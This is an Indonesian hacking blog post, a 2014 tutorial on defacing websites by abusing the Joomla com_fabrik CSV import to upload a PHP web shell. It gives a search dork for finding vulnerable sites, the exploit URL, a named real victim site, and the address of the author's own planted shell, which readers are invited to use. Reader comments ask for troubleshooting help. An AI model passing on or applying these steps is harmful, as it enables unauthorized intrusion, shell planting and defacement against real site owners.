Cara Deface website dengan Metode Com_Fabrik + Upload Shell terbaru 2014 | Bekasi Cyber Crash

Malam sobatku ....
sorry belakangan2 ini ane jarang posting di blog ini. Ane juga banyak kesibukan di dunia nyata sana, Mohon doain ane sob semoga ane UTSnya lancar nanti.... aamiin.

Okeee tanpa basa-basi lagi. Sesuai posting ane mau share tentang Cara Deface website dengan COM_fabrik. Dimana sebelumnya ane udah posting Software pengingat Adzan 5 waktu "Shollu" Full Versi.

Yap langsung aja simak Tutorialnya dibawah ini.

1. Dork ----->>>> inurl:viewTable?cid= site:com ----->>> sitenya boleh diganti dengan il, id, org, dll.

2. Setelah dapet websitenya langsung Eksekusi, dengan Exploit ini  ---->>> index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. Contoh websitenya nih --> www.didacta21.com/

4. setelah kita buka site www.didacta21.com/ kita tambahin exploit di belakangnya jadi http://didacta21.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1.

5. Makan tampilannya akan seperti ini brow

6. tinggal klik Pilih File atau Choose File..

7. Cari shell yang mau kita upload.

8. lalu Klik Importar Csv

9. kalo berhasil Langsung saja buka http://didacta21.com/media/[namashell.php]

10. Ini Uploadan Shell ane.... http://didacta21.com/media/Salah.php

Tinggal Eksekusi aja sob..... Selama Shell ane aman di sitenya ... Kalian boleh upload-upload apapun dari shell saya.

Cuman segini aja pembahasan kita hari ini .... Terima Kasih ya untuk kalian yang selalu mengunjungi Blog saya......!

Wassalamu'alaikum wr.wb

Baca juga yang ini:

4 komentar:

Anonim mengatakan...

Not vulnerable dav kalo kayak gini ??

Unknown mengatakan...

itu ga vuln mas

Unknown mengatakan...

kok ini padahal udah di upload mas tapi, gabisa di panggil shll nya.. itu gmna?

KIEW mengatakan...

gan kalo internal serv error gmana?wkwkwk

Posting Komentar

1. Berkomentarlah yang baik-baik
2. Jangan Gunakan kata-kata kotor
3. Ucapkanlah Terima Kasih bilamana setelah komentar, memberi saran atau yang lain-lainnya

Terima Kasih

 

Bekasi Cyber Crash Copyright © 2011-2012 | Powered by Blogger